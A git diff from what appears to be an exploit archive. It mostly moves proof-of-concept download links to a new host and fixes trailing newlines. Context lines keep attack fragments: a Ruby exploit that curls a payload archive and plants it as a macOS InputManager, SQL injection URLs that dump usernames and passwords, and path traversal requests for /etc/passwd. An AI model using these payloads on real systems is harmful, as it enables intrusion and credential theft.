leading to the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29190.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29190.bz2 \ No newline at end of file diff --git a/exploits/osx/local/30096.txt b/exploits/osx/local/30096.txt index 9b62c4d5d..6bee6203d 100644 --- a/exploits/osx/local/30096.txt +++ b/exploits/osx/local/30096.txt @@ -8,4 +8,4 @@ Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue. This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30096.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30096.tar.gz \ No newline at end of file diff --git a/exploits/osx/local/3181.rb b/exploits/osx/local/3181.rb index 0b0617572..d4d3145f7 100755 --- a/exploits/osx/local/3181.rb +++ b/exploits/osx/local/3181.rb @@ -12,7 +12,7 @@ bugselected = (ARGV[0] || 0).to_i # INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz" # keeping a local backup. /str0ke -INPUTMANAGER_URL = "https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3181.tar.gz" +INPUTMANAGER_URL = "https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3181.tar.gz" INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" + "mkdir -p ~/Library/InputManagers/;" + "cd ~/Library/InputManagers/;" + diff --git a/exploits/osx/local/37825.txt b/exploits/osx/local/37825.txt index a0777ce5b..2e46f29df 100644 --- a/exploits/osx/local/37825.txt +++ b/exploits/osx/local/37825.txt @@ -10,4 +10,4 @@ full writeup #eta#son shout out @ unthreadedjb 4 hax -Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37825.zip \ No newline at end of file +Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37825.zip \ No newline at end of file diff --git a/exploits/osx/local/38136.txt b/exploits/osx/local/38136.txt index 34f979ecc..a27e89bda 100644 --- a/exploits/osx/local/38136.txt +++ b/exploits/osx/local/38136.txt @@ -14,4 +14,4 @@ The Install.framework runner suid root binary does not correctly account for the build using the provided makefile and run passing the full path to the localhost shell Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38136.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38136.zip \ No newline at end of file diff --git a/exploits/osx/local/38137.txt b/exploits/osx/local/38137.txt index a235a6f31..e776c7645 100644 --- a/exploits/osx/local/38137.txt +++ b/exploits/osx/local/38137.txt @@ -64,4 +64,4 @@ Install.framework has a suid root binary here: /System/Library/PrivateFrameworks note that this will create some root-owned temporary directories in /tmp which will need to be manually cleaned up Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38137.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38137.zip \ No newline at end of file diff --git a/exploits/osx/local/38138.txt b/exploits/osx/local/38138.txt index 95da17585..7250526d5 100644 --- a/exploits/osx/local/38138.txt +++ b/exploits/osx/local/38138.txt @@ -52,4 +52,4 @@ the error path in setExternalAuthorizationRef should either be fatal or drop pri Make sure you have the latest xcode installed and run the get_shell.sh script to build and run the PoC. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38138.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38138.zip \ No newline at end of file diff --git a/exploits/osx/local/39741.txt b/exploits/osx/local/39741.txt index a12092cc4..378597d8b 100644 --- a/exploits/osx/local/39741.txt +++ b/exploits/osx/local/39741.txt @@ -38,4 +38,4 @@ Alternative implementation with bootstrap_create_server possible for older versi Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39741.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39741.zip \ No newline at end of file diff --git a/exploits/osx/local/3985.txt b/exploits/osx/local/3985.txt index a89c9b112..4cf726ff4 100644 --- a/exploits/osx/local/3985.txt +++ b/exploits/osx/local/3985.txt @@ -1,5 +1,5 @@ Mac OS X <= 10.4.8 pppd Plugin Loading Privilege Escalation Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3985.tar (05252007-osxpppd.tar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3985.tar (05252007-osxpppd.tar) # milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/exploits/osx/local/4013.txt b/exploits/osx/local/4013.txt index e5b371401..d54ab4f10 100644 --- a/exploits/osx/local/4013.txt +++ b/exploits/osx/local/4013.txt @@ -2,6 +2,6 @@ # # CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4013.tar.gz (05302007-vpenis.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4013.tar.gz (05302007-vpenis.tar.gz) # milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/exploits/osx/local/40653.txt b/exploits/osx/local/40653.txt index fbe3ed725..e539ec3de 100644 --- a/exploits/osx/local/40653.txt +++ b/exploits/osx/local/40653.txt @@ -28,4 +28,4 @@ No race conditions because the task struct pointer is on the kernel heap, not th Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40653.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40653.zip \ No newline at end of file diff --git a/exploits/osx/local/44239.md b/exploits/osx/local/44239.md index 9c2c60ffc..a1ccfe9f8 100644 --- a/exploits/osx/local/44239.md +++ b/exploits/osx/local/44239.md @@ -28,4 +28,4 @@ The rootsh code is released into the public domain. As a courtesy I ask that if you use any of this code in another project you attribute it to me. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44239.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44239.zip \ No newline at end of file diff --git a/exploits/osx/remote/21596.txt b/exploits/osx/remote/21596.txt index 85b487c6e..c2fc44493 100644 --- a/exploits/osx/remote/21596.txt +++ b/exploits/osx/remote/21596.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for MacOS X where an attacker may use Software In order to exploit this vulnerability, the attacker must control the machine located at swquery.apple.com, from the perspective of the vulnerable client. It may be possible to create this condition through some known techniques, including DNS cache poisoning and DNS spoofing. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21596.tgz.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21596.tgz.tar \ No newline at end of file diff --git a/exploits/osx/remote/25598.txt b/exploits/osx/remote/25598.txt index 56ff53808..01b0d17cf 100644 --- a/exploits/osx/remote/25598.txt +++ b/exploits/osx/remote/25598.txt @@ -4,6 +4,6 @@ Apple Mac OS X is prone to a directory-traversal vulnerability. Since the softwa This issue was initially reported in BID 13480 (Apple Mac OS X Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a new BID. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25598-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25598-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25598-2.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25598-2.tar.gz \ No newline at end of file diff --git a/exploits/osx/remote/28643.txt b/exploits/osx/remote/28643.txt index a81e9e43a..d7a0c8877 100644 --- a/exploits/osx/remote/28643.txt +++ b/exploits/osx/remote/28643.txt @@ -4,4 +4,4 @@ The Apple Mac OS X AirPort wireless driver is prone to multiple buffer-overflow An attacker can exploit these issues to have arbitrary machine code execute with kernel-level privileges. One of the issues allows code execution in the context of an application using the wireless API. This may lead to denial-of-service conditions or the complete compromise of the affected computer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28643.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28643.zip \ No newline at end of file diff --git a/exploits/osx/remote/29448.txt b/exploits/osx/remote/29448.txt index 6d71da7d2..14e7a8fca 100644 --- a/exploits/osx/remote/29448.txt +++ b/exploits/osx/remote/29448.txt @@ -6,4 +6,4 @@ A successful exploit can allow a remote attacker to cause kernel panic, resultin Mac OS X 10.4.8 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29448.dmg.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29448.dmg.gz \ No newline at end of file diff --git a/exploits/osx/remote/8753.txt b/exploits/osx/remote/8753.txt index 78f0507ba..4b1d080f9 100644 --- a/exploits/osx/remote/8753.txt +++ b/exploits/osx/remote/8753.txt @@ -42,6 +42,6 @@ systems. http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html -compiled/decompiled: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8753.tgz (2009-javax.tgz) +compiled/decompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8753.tgz (2009-javax.tgz) # milw0rm.com [2009-05-20] \ No newline at end of file diff --git a/exploits/palm_os/local/20241.txt b/exploits/palm_os/local/20241.txt index 76b697ce6..0504370f9 100644 --- a/exploits/palm_os/local/20241.txt +++ b/exploits/palm_os/local/20241.txt @@ -6,6 +6,6 @@ The encoded password block is stored in the 'Unsaved Preferences' database on th Successful exploitation yields unauthorized access to private data. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20241-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20241-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20241-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20241-2.zip \ No newline at end of file diff --git a/exploits/palm_os/local/20505.txt b/exploits/palm_os/local/20505.txt index c8c230a1e..ba87c63f1 100644 --- a/exploits/palm_os/local/20505.txt +++ b/exploits/palm_os/local/20505.txt @@ -46,4 +46,4 @@ The are also a number of likely scenarios that can allow an attacker to obtain t * The attacker may view the tokencode as it is being physically entered by the user ("shoulder surfing"). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20505.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20505.zip \ No newline at end of file diff --git a/exploits/php/dos/14678.txt b/exploits/php/dos/14678.txt index bd88540fb..b7aaa3c85 100644 --- a/exploits/php/dos/14678.txt +++ b/exploits/php/dos/14678.txt @@ -49,4 +49,4 @@ FROM rdb$database", generator, inc); =========================================================================== Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14678.zip (ibase_gen_id_poc.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14678.zip (ibase_gen_id_poc.zip) \ No newline at end of file diff --git a/exploits/php/dos/18296.txt b/exploits/php/dos/18296.txt index 559b503e6..96fcfc18d 100644 --- a/exploits/php/dos/18296.txt +++ b/exploits/php/dos/18296.txt @@ -20,7 +20,7 @@ Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18296.txt (hashcollide.txt) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt) http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt diff --git a/exploits/php/dos/24855.txt b/exploits/php/dos/24855.txt index f582a094a..ce5f1ad41 100644 --- a/exploits/php/dos/24855.txt +++ b/exploits/php/dos/24855.txt @@ -18,4 +18,4 @@ The PHP function 'unserialize()' is also reported prone to an information disclo Finally, the PHP function 'unserialize()', is reported prone to an additional vulnerability. It is reported that previous versions of this function allow a malicious programmer to set references to entries of a variable hash that have already been freed. This can lead to remote memory corruption. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24855.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24855.zip \ No newline at end of file diff --git a/exploits/php/dos/33677.txt b/exploits/php/dos/33677.txt index ed021e9b7..e4c31de00 100644 --- a/exploits/php/dos/33677.txt +++ b/exploits/php/dos/33677.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to steal sessions or other sensitive data. Versions prior to PHP 5.2.13 are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33677.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33677.tar.gz \ No newline at end of file diff --git a/exploits/php/dos/35358.txt b/exploits/php/dos/35358.txt index 615e2077c..886077d7e 100644 --- a/exploits/php/dos/35358.txt +++ b/exploits/php/dos/35358.txt @@ -1,4 +1,4 @@ -Full Package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35358.tgz +Full Package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35358.tgz Description: ------------ diff --git a/exploits/php/dos/44768.txt b/exploits/php/dos/44768.txt index 7f4487afa..1aebbdf66 100644 --- a/exploits/php/dos/44768.txt +++ b/exploits/php/dos/44768.txt @@ -9,4 +9,4 @@ An application is vulnerable when: - And the SQL mode does not contain STRICT_ALL_TABLES or STRICT_TRANS_TABLES (check via SELECT @@sql_mode). POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44768.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44768.tgz \ No newline at end of file diff --git a/exploits/php/remote/32618.txt b/exploits/php/remote/32618.txt index bea2efe07..8b7987c53 100644 --- a/exploits/php/remote/32618.txt +++ b/exploits/php/remote/32618.txt @@ -72,4 +72,4 @@ mysql root, facebook/twitter accounts and so on. --- -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32618.tgz \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32618.tgz \ No newline at end of file diff --git a/exploits/php/remote/39742.txt b/exploits/php/remote/39742.txt index db1cc7296..7a277b85a 100644 --- a/exploits/php/remote/39742.txt +++ b/exploits/php/remote/39742.txt @@ -204,5 +204,5 @@ This issue has been fixed in php 7.0.6. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39742.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39742.zip https://github.com/dyntopia/exploits/tree/master/CVE-2016-3078 \ No newline at end of file diff --git a/exploits/php/remote/42692.rb b/exploits/php/remote/42692.rb index 0038949f5..17d92719b 100755 --- a/exploits/php/remote/42692.rb +++ b/exploits/php/remote/42692.rb @@ -113,4 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/exploits/php/webapps/10069.php b/exploits/php/webapps/10069.php index 0e379e82b..53fc39e85 100644 --- a/exploits/php/webapps/10069.php +++ b/exploits/php/webapps/10069.php @@ -52,6 +52,4 @@ $resp .= fread($ock, 1024); echo $resp; echo "[+]done!\r\n"; echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash" -?> - - +?> \ No newline at end of file diff --git a/exploits/php/webapps/10407.txt b/exploits/php/webapps/10407.txt index 4ce2c9508..0ba26ca49 100644 --- a/exploits/php/webapps/10407.txt +++ b/exploits/php/webapps/10407.txt @@ -36,6 +36,4 @@ http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product [#] Thx to - HI Cyber4rt crew [Facebook: Hacker Indonesia] -- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU - - +- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU \ No newline at end of file diff --git a/exploits/php/webapps/10656.txt b/exploits/php/webapps/10656.txt index f0ead93e5..79bbbfb37 100644 --- a/exploits/php/webapps/10656.txt +++ b/exploits/php/webapps/10656.txt @@ -22,5 +22,4 @@ http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name [+] example [+] http://www.youtube.com/watch?v=uEK_Ah3htr0 ====================================================================================== -[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members - +[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members \ No newline at end of file diff --git a/exploits/php/webapps/11028.txt b/exploits/php/webapps/11028.txt index 4ddd96243..05ea3bec1 100644 --- a/exploits/php/webapps/11028.txt +++ b/exploits/php/webapps/11028.txt @@ -24,4 +24,4 @@ http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lo # Greetz : To all my friends # Note : Proud to be a Sri Lankan # Me : Sri Lankan Hacker -######################################## +######################################## \ No newline at end of file diff --git a/exploits/php/webapps/11222.txt b/exploits/php/webapps/11222.txt index dc230bfae..bb2098305 100644 --- a/exploits/php/webapps/11222.txt +++ b/exploits/php/webapps/11222.txt @@ -32,4 +32,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11236.txt b/exploits/php/webapps/11236.txt index 62de0c91c..638755219 100644 --- a/exploits/php/webapps/11236.txt +++ b/exploits/php/webapps/11236.txt @@ -46,4 +46,4 @@ areas%5B%5D=content&Itemid=1§ionid=0&limitstart= !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11237.txt b/exploits/php/webapps/11237.txt index 260d00afc..7923a7fa3 100644 --- a/exploits/php/webapps/11237.txt +++ b/exploits/php/webapps/11237.txt @@ -29,4 +29,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11238.txt b/exploits/php/webapps/11238.txt index 3eba834c9..76c4f04b1 100644 --- a/exploits/php/webapps/11238.txt +++ b/exploits/php/webapps/11238.txt @@ -26,4 +26,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11239.txt b/exploits/php/webapps/11239.txt index 550bfaf52..40c40ef5f 100644 --- a/exploits/php/webapps/11239.txt +++ b/exploits/php/webapps/11239.txt @@ -43,4 +43,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11270.txt b/exploits/php/webapps/11270.txt index f273c8ed8..f504b40c1 100644 --- a/exploits/php/webapps/11270.txt +++ b/exploits/php/webapps/11270.txt @@ -45,4 +45,4 @@ Array ( [0] => option [1] => [JOOMLA_PATH] [2] => ' AND 1=1 ) !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11271.txt b/exploits/php/webapps/11271.txt index d41f55942..68028f6c5 100644 --- a/exploits/php/webapps/11271.txt +++ b/exploits/php/webapps/11271.txt @@ -28,4 +28,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11277.txt b/exploits/php/webapps/11277.txt index 775d7bc14..ea60b5195 100644 --- a/exploits/php/webapps/11277.txt +++ b/exploits/php/webapps/11277.txt @@ -27,4 +27,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11279.txt b/exploits/php/webapps/11279.txt index dbf802555..5edaec7e6 100644 --- a/exploits/php/webapps/11279.txt +++ b/exploits/php/webapps/11279.txt @@ -31,4 +31,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11280.txt b/exploits/php/webapps/11280.txt index 87a301fb6..c3586b8e8 100644 --- a/exploits/php/webapps/11280.txt +++ b/exploits/php/webapps/11280.txt @@ -30,4 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11286.txt b/exploits/php/webapps/11286.txt index 237eb8a26..2f97f379b 100644 --- a/exploits/php/webapps/11286.txt +++ b/exploits/php/webapps/11286.txt @@ -30,4 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11287.txt b/exploits/php/webapps/11287.txt index 1665c9fe1..17c1a4c85 100644 --- a/exploits/php/webapps/11287.txt +++ b/exploits/php/webapps/11287.txt @@ -30,4 +30,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11292.txt b/exploits/php/webapps/11292.txt index 3923e264d..d1049efbe 100644 --- a/exploits/php/webapps/11292.txt +++ b/exploits/php/webapps/11292.txt @@ -25,4 +25,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/php/webapps/11349.txt b/exploits/php/webapps/11349.txt index 75352c734..35690980f 100644 --- a/exploits/php/webapps/11349.txt +++ b/exploits/php/webapps/11349.txt @@ -21,4 +21,4 @@ Demo: http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user-- -#################################################################### +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/11610.txt b/exploits/php/webapps/11610.txt index c6a0e4968..5cce93434 100644 --- a/exploits/php/webapps/11610.txt +++ b/exploits/php/webapps/11610.txt @@ -32,4 +32,4 @@ http://server/catalog/good.php?good_id=1/**/union/**/all/**/select/**/1,2,3,4,5, http://server/catalog/good.php?good_id= -http://server/catalog/good.php?good_id=164 +http://server/catalog/good.php?good_id=164 \ No newline at end of file diff --git a/exploits/php/webapps/11674.txt b/exploits/php/webapps/11674.txt index 5d8adce54..7a7fabcd4 100644 --- a/exploits/php/webapps/11674.txt +++ b/exploits/php/webapps/11674.txt @@ -25,5 +25,4 @@ [+] Exploitable - http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- - + http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser-- \ No newline at end of file diff --git a/exploits/php/webapps/11676.txt b/exploits/php/webapps/11676.txt index 69bb61057..f7ada6004 100644 --- a/exploits/php/webapps/11676.txt +++ b/exploits/php/webapps/11676.txt @@ -53,5 +53,4 @@ After execution refresh the page and u can see that user having giving ID get deleted automatically. -#If you have any questions, comments, or concerns, feel free to contact me. - +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11680.txt b/exploits/php/webapps/11680.txt index 442f73b1e..aaec9d565 100644 --- a/exploits/php/webapps/11680.txt +++ b/exploits/php/webapps/11680.txt @@ -79,4 +79,4 @@ After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege. -#If you have any questions, comments, or concerns, feel free to contact me. +#If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11686.txt b/exploits/php/webapps/11686.txt index c5b56db06..941a7d6eb 100644 --- a/exploits/php/webapps/11686.txt +++ b/exploits/php/webapps/11686.txt @@ -68,4 +68,4 @@ After execution refresh the page and u can see that a new link with teh given name is Added automatically. - #If you have any questions, comments, or concerns, feel free to contact me. + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11781.html b/exploits/php/webapps/11781.html index 171b43cb0..16def59fd 100644 --- a/exploits/php/webapps/11781.html +++ b/exploits/php/webapps/11781.html @@ -50,4 +50,4 @@ After execution refresh the page and u can see that a added content is deleted automatically. - #If you have any questions, comments, or concerns, feel free to contact me. + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/11829.txt b/exploits/php/webapps/11829.txt index 23372ca99..fc487db3d 100644 --- a/exploits/php/webapps/11829.txt +++ b/exploits/php/webapps/11829.txt @@ -26,5 +26,4 @@ [+] Exploitable - http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1-- - + http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1-- \ No newline at end of file diff --git a/exploits/php/webapps/11841.txt b/exploits/php/webapps/11841.txt index 44218116d..281cec329 100644 --- a/exploits/php/webapps/11841.txt +++ b/exploits/php/webapps/11841.txt @@ -11,4 +11,4 @@ exploit: http://localhost.com/stack/documentation.php?action=/../../../../../../ =============================================================================================== Salam Hangat: S3T4N, JACK, MADONK, YOGA0400, EMINEM, YUDIS, VRS-HCK, OON_BOY, NOGE KECEMPLUNGKALEN, ALL MAINHACK, ALL SERVERISDOWN.ORG -================================================================================================ +================================================================================================ \ No newline at end of file diff --git a/exploits/php/webapps/12009.html b/exploits/php/webapps/12009.html index a27adeb2c..29fd5da9e 100644 --- a/exploits/php/webapps/12009.html +++ b/exploits/php/webapps/12009.html @@ -85,4 +85,4 @@ After execution just refresh the page and we can see that the admin user added automatically. - #If you have any questions, comments, or concerns, feel free to contact me. + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/exploits/php/webapps/12101.txt b/exploits/php/webapps/12101.txt index bae30b7b0..420803d1b 100644 --- a/exploits/php/webapps/12101.txt +++ b/exploits/php/webapps/12101.txt @@ -28,5 +28,4 @@ Greetz : -:- SkyCreW -:- Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , mywisdom , s4va, Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk -(o)===================================================================================(o) - +(o)===================================================================================(o) \ No newline at end of file diff --git a/exploits/php/webapps/12325.txt b/exploits/php/webapps/12325.txt index f0d376c2a..557625d91 100644 --- a/exploits/php/webapps/12325.txt +++ b/exploits/php/webapps/12325.txt @@ -10,5 +10,4 @@ dork :inurl:index.php?option=com_portfolio exp: -http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd - +http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd \ No newline at end of file diff --git a/exploits/php/webapps/12338.txt b/exploits/php/webapps/12338.txt index fcc6c0c53..5a1621a10 100644 --- a/exploits/php/webapps/12338.txt +++ b/exploits/php/webapps/12338.txt @@ -21,7 +21,7 @@ export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_temp 